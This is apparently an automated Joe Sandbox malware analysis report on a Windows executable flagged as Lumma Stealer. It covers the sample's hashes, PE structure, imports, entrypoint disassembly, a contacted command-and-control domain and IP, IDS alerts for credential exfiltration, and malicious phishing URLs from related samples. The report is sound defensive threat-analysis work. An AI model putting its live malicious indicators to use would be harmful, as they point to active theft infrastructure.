http://search.imesh.net/favicon.ico	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://pe.search.yahoo.com/favicon.icohttps://pe.search.yahoo.com/search	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/dawn/792	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://arianna.libero.it/search/abin/integrata.cgi?query=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://search.brave.com/search?q=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/dawn/673	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://imgs.sapo.pt/images/sapo.ico	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://search.privacywall.org/suggest.php?q=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://de.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://yandex.ua/images/search/?rpt=imageviewhttps://www.yandex.ua/chrome/newtabp	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://ar.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.mojeek.com/favicon.ico	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/tint/1497	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.yandex.ua/chrome/newtab	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://id.search.yahoo.com/favicon.ico	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.64.165	scratgyy.biz	United States	13335	CLOUDFLARENETUS	true
142.251.40.100	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false

Private

IP
192.168.11.20

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1543317
Start date and time:	2024-10-27 17:01:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected VM Detection
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@35/4@5/4
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.72.99, 142.250.176.206, 172.253.115.84, 34.104.35.123, 172.253.122.95, 142.251.163.95, 172.253.63.95, 172.253.115.95, 172.253.62.95, 142.250.31.95, 142.251.179.95, 142.251.167.95, 142.251.16.95, 142.251.111.95, 64.233.180.95, 142.251.41.10, 142.250.80.74, 142.250.80.106, 142.250.81.234, 142.250.80.42, 142.250.176.202, 142.251.40.202, 142.251.40.106, 142.251.35.170, 142.251.40.234, 142.250.65.202, 142.250.65.234, 142.251.40.138, 172.217.165.138, 142.250.65.170, 142.251.32.106
Excluded domains from analysis (whitelisted): ecs.office.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com, www.googleapis.com, optimizationguide-pa.googleapis.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe

Simulations

Behavior and APIs

Time	Type	Description
12:04:31	API Interceptor	9x Sleep call for process: EpicUpdate.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
239.255.255.250	2QPrBtk3J8.exe	Get hash	malicious	Unknown	Browse
	v9dVG4fAGa.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	LkCinYWgNh.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	R40XD2LfcZ.exe	Get hash	malicious	Clipboard Hijacker	Browse
	v9dVG4fAGa.exe	Get hash	malicious	Clipboard Hijacker	Browse
	UfRKIdsNvD.exe	Get hash	malicious	Clipboard Hijacker	Browse
	LkCinYWgNh.exe	Get hash	malicious	Clipboard Hijacker	Browse
	2QPrBtk3J8.exe	Get hash	malicious	Clipboard Hijacker	Browse
	https://duy38.r.ag.d.sendibm3.com/mk/cl/f/sh/1t6Af4OiGsF30wT9TF4ckLf3fAzx5z/28D7HenRXzOU	Get hash	malicious	LummaC	Browse
	https://onlinepdf-qrsharedfile.com/index.html#XYWRhbV9oYW1tZXJtYW5AbnltYy5lZHU=	Get hash	malicious	HTMLPhisher	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	MilkaCheats.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	104.21.95.91
	17300406664afe7aec458893633a7734ab1b119dd638ebaf863f6f65e2e732ab9f2f071556149.dat-decoded.exe	Get hash	malicious	Zhark RAT	Browse	104.21.44.95
	17300406664afe7aec458893633a7734ab1b119dd638ebaf863f6f65e2e732ab9f2f071556149.dat-decoded.exe	Get hash	malicious	Zhark RAT	Browse	172.67.198.131
	care.rtf	Get hash	malicious	Unknown	Browse	104.21.43.157
	file.exe	Get hash	malicious	LummaC	Browse	104.21.95.91
	na.doc	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	na.doc	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.95.91

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://duy38.r.ag.d.sendibm3.com/mk/cl/f/sh/1t6Af4OiGsF30wT9TF4ckLf3fAzx5z/28D7HenRXzOU	Get hash	malicious	LummaC	Browse	52.113.194.132
	https://link.edgepilot.com/s/e9b35021/KNsrNVGwOUukNjaKm_560w?u=https://publicidadnicaragua.com/	Get hash	malicious	Unknown	Browse	52.113.194.132
	Solaris-A65BA.exe	Get hash	malicious	Unknown	Browse	52.113.194.132
	http://cio.krqe.com/gtdhffgjghfj3081868fB16927453Xe78849729yB17367Xb25vBr206268IG	Get hash	malicious	Unknown	Browse	52.113.194.132
	g3Wg5cdIcT.html	Get hash	malicious	LonePage	Browse	52.113.194.132
	1El22bCuSq.html	Get hash	malicious	Unknown	Browse	52.113.194.132
	ZtefPP1HI7.cmd	Get hash	malicious	Unknown	Browse	52.113.194.132
	J1IrCccVO6.bat	Get hash	malicious	Unknown	Browse	52.113.194.132
	IDfVY125HU.html	Get hash	malicious	WinSearchAbuse	Browse	52.113.194.132
	https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	52.113.194.132
a0e9f5d64349fb13191bc781f81f42e1	MilkaCheats.exe	Get hash	malicious	LummaC	Browse	104.21.64.165
	file.exe	Get hash	malicious	LummaC	Browse	104.21.64.165
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	104.21.64.165
	file.exe	Get hash	malicious	LummaC	Browse	104.21.64.165
	file.exe	Get hash	malicious	LummaC	Browse	104.21.64.165
	file.exe	Get hash	malicious	LummaC	Browse	104.21.64.165
	file.exe	Get hash	malicious	LummaC	Browse	104.21.64.165
	file.exe	Get hash	malicious	LummaC	Browse	104.21.64.165
	file.exe	Get hash	malicious	LummaC	Browse	104.21.64.165
	SecuriteInfo.com.Win32.Evo-gen.20836.29869.exe	Get hash	malicious	LummaC	Browse	104.21.64.165

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	569344
Entropy (8bit):	7.76436021183035
Encrypted:	false
SSDEEP:	12288:r3hamGbEH4ISv/oGeDPwPbQzNzC5KOotvnH3KDguhbXcNMA:rfmEHXSvIzp5OodnHaDguhbXcn
MD5:	A714F3782DA3635B8054341B43EFF069
SHA1:	C5EFBEA6ED37554EED2678E0A5F00C31E86284D2
SHA-256:	48483DA5A486E5E525E51F272204F60F4F20F1F2D51E5F38867783D75D12E1FB
SHA-512:	0E96667D83A6655E31AE196DAE3CF23B09420E44C920CD7608F2136B2A29343FFF4F8AD5BEB4A294E5E0A7E964AAECAEC3EEB7E0EAA98024174E5CAD9A578BB5
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g..........".................b_............@.......................................@.................................h...P..........................................................8h......@?.............. ...h............................text...+........................... ..`.rdata...x... ...z..................@..@.data...(...........................@....gfids..............................@..@.tls....-...........................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\temp_bRBfgSMcTpYCpANwkGLzu

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.5
Encrypted:	false
SSDEEP:	3:cMRG/ic:cQaic
MD5:	773904D373D8E55504ECB259656B281E
SHA1:	F8D758F9C903EA75110DAD6D31F861CFFC29DC5B
SHA-256:	2DA3BF745B7692957B34A88191DD53D5E5DA2BB2524520C423D51A530CDCC143
SHA-512:	7F2144F7878E124D7D4180C3269FE873B990BFC8B9E85B35ECA495DC9036D6C20624F2AFA37FA05FF2586445772D93F453DD31EDF73E9B4E7320AF265041F44D
Malicious:	false
Reputation:	low
Preview:	nolimitcashmoney

Chrome Cache Entry: 54

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (824)
Category:	downloaded
Size (bytes):	829
Entropy (8bit):	5.133761681299211
Encrypted:	false
SSDEEP:	24:9/0vlbJZkBHslgT1d1uawBuoBN2t2t2t2t2t2t2tomffffffo:9Mvl1CKlgJXwBuSNYYYYYYYomffffffo
MD5:	E275CFAECC011FA7F98BEF1DFA2D27C8
SHA1:	18D30D85D7BE1926279A4AE9B5C6948C6AA27205
SHA-256:	DA72756C0D657FAF05894DD662765266F39A41B5157D64EC7176F27D6079AFC7
SHA-512:	ABE31933BF3CD807CDDCF7E93C028BF44EDE9C05E7694DB748C24E942E20E15DEB5964604DA8351B558C16CDAA31DF9E6A6CA72CA4F68FACF81D46C320B5378A
Malicious:	false
Reputation:	low
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["scout terra truck","alabama state alabama a\u0026m score","venom death last dance","monopoly go tycoon club website","knicks nba g league draft","snl host tonight october 26","nasa astronauts spacex","instagram halloween notes"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNoZXMoCg\u003d\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.615316361918846
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe
File size:	972'800 bytes
MD5:	6b47cfd828d584f77aa7496b094c1f82
SHA1:	53779e6456cd6f8d6572c22190141d4464045f17
SHA256:	d468becc83ba215453be50cdd6079a2e16501a75c8b6b46add8437ba5f069f99
SHA512:	bb713f5e92736928a1356cd0bc955580af249db7f45a02646724470327706c7bc85a2e8714743398f808ccd95237f78f34d99684305dd3fe021c24469147102d
SSDEEP:	12288:QcdnkjXWQeBXldJW1cMrY2c1OLl/EtCLRGhbVS5+DnUiINOe+ICYwAbBRIivS27y:QcWjmNJOFNe6l/2OmhYOZICYreJIr07
TLSH:	9125D003E2A290F8D026C5F49756A632F6327C054B2479EB9BD0BB212F65FD06B3DB15
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...k..g..........".................p..........@.............................P............`........................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x14003eb70
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6709AD6B [Fri Oct 11 22:57:47 2024 UTC]
TLS Callbacks:	0x400248b0, 0x1
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	dac20a408a16d396d39804339c3d3c76

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F3658D48540h
dec eax
add esp, 28h
jmp 00007F3658D48157h
int3
int3
dec eax
sub esp, 28h
call 00007F3658D482F4h
dec eax
neg eax
sbb eax, eax
neg eax
dec eax
dec eax
add esp, 28h
ret
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
cmp dword ptr [000ADE5Eh], FFFFFFFFh
dec eax
mov ebx, ecx
jne 00007F3658D482E9h
call 00007F3658D4A0B5h
jmp 00007F3658D482F1h
dec eax
mov edx, ebx
dec eax
lea ecx, dword ptr [000ADE48h]
call 00007F3658D4A020h
xor edx, edx
test eax, eax
dec eax
cmove edx, ebx
dec eax
mov eax, edx
dec eax
add esp, 20h
pop ebx
ret
int3
int3
dec eax
sub esp, 18h
dec esp
mov eax, ecx
mov eax, 00005A4Dh
cmp word ptr [FFFC1415h], ax
jne 00007F3658D4835Ah
dec eax
arpl word ptr [FFFC1448h], cx
dec eax
lea edx, dword ptr [FFFC1405h]
dec eax
add ecx, edx
cmp dword ptr [ecx], 00004550h
jne 00007F3658D48341h
mov eax, 0000020Bh
cmp word ptr [ecx+18h], ax
jne 00007F3658D48336h
dec esp
sub eax, edx
movzx eax, word ptr [ecx+14h]
dec eax
lea edx, dword ptr [ecx+18h]
dec eax
add edx, eax
movzx eax, word ptr [ecx+06h]
dec eax
lea ecx, dword ptr [eax+eax*4]
dec esp
lea ecx, dword ptr [edx+ecx*8]
dec eax
mov dword ptr [esp], edx
dec ecx
cmp edx, ecx
je 00007F3658D482FAh
mov ecx, dword ptr [edx+0Ch]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xe8780	0x104	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0xee000	0x1a94	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf4000	0x714	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xe8670	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xe5ef0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xe1220	0x138	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xe8d98	0x510	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4d7c6	0x4d800	270bdecd86fb0a97023de012b1c01ec8	False	0.5290259576612903	data	6.422402105574861	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x4f000	0x9c54c	0x9c600	9cb56d054baffad9f3a976d15842b192	False	0.947445168864908	Matlab v4 mat-file (little endian) P1\375\377\020\024\375\377, rows 0, columns 0	7.919772806447799	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xec000	0x1b90	0xa00	43988c1d0c693e44bbb1bed7cfc7787e	False	0.14453125	data	1.8975382892896329	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0xee000	0x1a94	0x1c00	b0d7797b9571ffde84e25a0f1f99eb53	False	0.48995535714285715	data	5.4167744171126975	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.gfids	0xf0000	0x80	0x200	5d9cc4ad7aef5daa3673e44f539faa34	False	0.21875	data	1.4724440397131502	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0xf1000	0x89	0x200	f73b9c36b3b22255f2ae96abc9a50361	False	0.037109375	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.voltbl	0xf2000	0x2a	0x200	eae09b4822d39f484dfe9175c88bb635	False	0.107421875	data	0.7001115316230119
_RDATA	0xf3000	0xf4	0x200	9c543827f948abaa867cc81b40f14a3f	False	0.31640625	data	2.47684505929459	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xf4000	0x714	0x800	65d411fe16d2f10f33e9b42e28072882	False	0.5537109375	data	5.158949560325444	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
bcryptprimitives.dll	ProcessPrng
api-ms-win-core-synch-l1-2-0.dll	WaitOnAddress, WakeByAddressAll, WakeByAddressSingle
ntdll.dll	NtQueryInformationProcess, NtQuerySystemInformation, NtWriteFile, RtlCaptureContext, RtlGetVersion, RtlLookupFunctionEntry, RtlNtStatusToDosError, RtlUnwindEx, RtlVirtualUnwind
ADVAPI32.dll	CopySid, GetLengthSid, GetTokenInformation, IsValidSid, OpenProcessToken
KERNEL32.dll	AddVectoredExceptionHandler, CloseHandle, CompareStringOrdinal, CompareStringW, CreateFileW, CreateNamedPipeW, CreateProcessW, CreateThread, CreateWaitableTimerExW, DeleteCriticalSection, DeleteProcThreadAttributeList, DuplicateHandle, EnterCriticalSection, ExitProcess, FindClose, FindFirstFileExA, FindFirstFileW, FindNextFileA, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetComputerNameExW, GetConsoleCP, GetConsoleMode, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetEnvironmentStringsW, GetEnvironmentVariableW, GetFileAttributesW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetFileType, GetFullPathNameW, GetLastError, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetProcessIoCounters, GetProcessTimes, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemDirectoryW, GetSystemInfo, GetSystemTimeAsFileTime, GetSystemTimePreciseAsFileTime, GetSystemTimes, GetTempPathW, GetTickCount64, GetWindowsDirectoryW, GlobalMemoryStatusEx, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeProcThreadAttributeList, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, K32GetPerformanceInfo, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, LocalFree, MultiByteToWideChar, OpenProcess, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, ReadFileEx, ReadProcessMemory, SetEnvironmentVariableA, SetFileInformationByHandle, SetFilePointerEx, SetLastError, SetStdHandle, SetThreadStackGuarantee, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SleepEx, SwitchToThread, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, UpdateProcThreadAttribute, VirtualQueryEx, WaitForSingleObject, WideCharToMultiByte, WriteConsoleW, WriteFile, WriteFileEx
powrprof.dll	CallNtPowerInformation
ole32.dll	CoCreateInstance, CoInitializeEx, CoInitializeSecurity, CoSetProxyBlanket, PropVariantClear
shell32.dll	CommandLineToArgvW
oleaut32.dll	GetErrorInfo, SafeArrayAccessData, SafeArrayDestroy, SafeArrayUnaccessData, SysAllocStringLen, SysFreeString, SysStringLen, VariantClear
psapi.dll	GetModuleFileNameExW
pdh.dll	PdhAddEnglishCounterW, PdhCloseQuery, PdhCollectQueryData, PdhGetFormattedCounterValue, PdhOpenQueryA, PdhRemoveCounter
propsys.dll	PropVariantToBSTR, VariantToPropVariant

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-27T17:04:32.509475+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.11.20	49745	104.21.64.165	443	TCP
2024-10-27T17:04:32.509475+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.11.20	49745	104.21.64.165	443	TCP
2024-10-27T17:04:33.627931+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.11.20	49746	104.21.64.165	443	TCP
2024-10-27T17:04:33.627931+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.11.20	49746	104.21.64.165	443	TCP
2024-10-27T17:04:53.582816+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.11.20	49766	104.21.64.165	443	TCP
2024-10-27T17:05:00.000478+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.11.20	49772	104.21.64.165	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 27, 2024 17:03:30.247461081 CET	49744	443	192.168.11.20	52.113.194.132
Oct 27, 2024 17:03:30.247524977 CET	443	49744	52.113.194.132	192.168.11.20
Oct 27, 2024 17:03:30.247772932 CET	49744	443	192.168.11.20	52.113.194.132
Oct 27, 2024 17:03:30.248111963 CET	49744	443	192.168.11.20	52.113.194.132
Oct 27, 2024 17:03:30.248140097 CET	443	49744	52.113.194.132	192.168.11.20
Oct 27, 2024 17:03:30.558805943 CET	443	49744	52.113.194.132	192.168.11.20
Oct 27, 2024 17:03:30.559103012 CET	49744	443	192.168.11.20	52.113.194.132
Oct 27, 2024 17:03:30.560535908 CET	49744	443	192.168.11.20	52.113.194.132
Oct 27, 2024 17:03:30.560547113 CET	443	49744	52.113.194.132	192.168.11.20
Oct 27, 2024 17:03:30.560786963 CET	443	49744	52.113.194.132	192.168.11.20
Oct 27, 2024 17:03:30.567161083 CET	49744	443	192.168.11.20	52.113.194.132
Oct 27, 2024 17:03:30.607969999 CET	443	49744	52.113.194.132	192.168.11.20
Oct 27, 2024 17:03:30.813558102 CET	443	49744	52.113.194.132	192.168.11.20
Oct 27, 2024 17:03:30.813589096 CET	443	49744	52.113.194.132	192.168.11.20
Oct 27, 2024 17:03:30.813687086 CET	443	49744	52.113.194.132	192.168.11.20
Oct 27, 2024 17:03:30.813770056 CET	49744	443	192.168.11.20	52.113.194.132
Oct 27, 2024 17:03:30.813788891 CET	443	49744	52.113.194.132	192.168.11.20
Oct 27, 2024 17:03:30.813848019 CET	443	49744	52.113.194.132	192.168.11.20
Oct 27, 2024 17:03:30.813883066 CET	49744	443	192.168.11.20	52.113.194.132
Oct 27, 2024 17:03:30.813895941 CET	443	49744	52.113.194.132	192.168.11.20
Oct 27, 2024 17:03:30.813946962 CET	49744	443	192.168.11.20	52.113.194.132
Oct 27, 2024 17:03:30.813946962 CET	49744	443	192.168.11.20	52.113.194.132
Oct 27, 2024 17:03:30.813961029 CET	443	49744	52.113.194.132	192.168.11.20
Oct 27, 2024 17:03:30.813999891 CET	49744	443	192.168.11.20	52.113.194.132
Oct 27, 2024 17:03:30.814183950 CET	49744	443	192.168.11.20	52.113.194.132
Oct 27, 2024 17:03:30.908826113 CET	443	49744	52.113.194.132	192.168.11.20
Oct 27, 2024 17:03:30.908967972 CET	49744	443	192.168.11.20	52.113.194.132
Oct 27, 2024 17:03:30.908984900 CET	443	49744	52.113.194.132	192.168.11.20
Oct 27, 2024 17:03:30.909059048 CET	49744	443	192.168.11.20	52.113.194.132
Oct 27, 2024 17:03:30.909084082 CET	443	49744	52.113.194.132	192.168.11.20
Oct 27, 2024 17:03:30.909142017 CET	443	49744	52.113.194.132	192.168.11.20
Oct 27, 2024 17:03:30.909178019 CET	49744	443	192.168.11.20	52.113.194.132
Oct 27, 2024 17:03:30.909210920 CET	49744	443	192.168.11.20	52.113.194.132
Oct 27, 2024 17:03:30.909224987 CET	443	49744	52.113.194.132	192.168.11.20
Oct 27, 2024 17:03:30.909312963 CET	49744	443	192.168.11.20	52.113.194.132
Oct 27, 2024 17:03:30.909312963 CET	49744	443	192.168.11.20	52.113.194.132
Oct 27, 2024 17:03:30.909358978 CET	49744	443	192.168.11.20	52.113.194.132
Oct 27, 2024 17:03:30.909620047 CET	443	49744	52.113.194.132	192.168.11.20
Oct 27, 2024 17:03:30.909806967 CET	443	49744	52.113.194.132	192.168.11.20
Oct 27, 2024 17:03:30.909893036 CET	49744	443	192.168.11.20	52.113.194.132
Oct 27, 2024 17:03:30.909914017 CET	443	49744	52.113.194.132	192.168.11.20
Oct 27, 2024 17:03:30.910015106 CET	443	49744	52.113.194.132	192.168.11.20
Oct 27, 2024 17:03:30.910026073 CET	49744	443	192.168.11.20	52.113.194.132
Oct 27, 2024 17:03:30.910084963 CET	49744	443	192.168.11.20	52.113.194.132
Oct 27, 2024 17:03:30.910103083 CET	443	49744	52.113.194.132	192.168.11.20
Oct 27, 2024 17:03:30.910166025 CET	443	49744	52.113.194.132	192.168.11.20
Oct 27, 2024 17:03:30.910188913 CET	49744	443	192.168.11.20	52.113.194.132
Oct 27, 2024 17:03:30.910237074 CET	49744	443	192.168.11.20	52.113.194.132
Oct 27, 2024 17:03:30.910286903 CET	49744	443	192.168.11.20	52.113.194.132
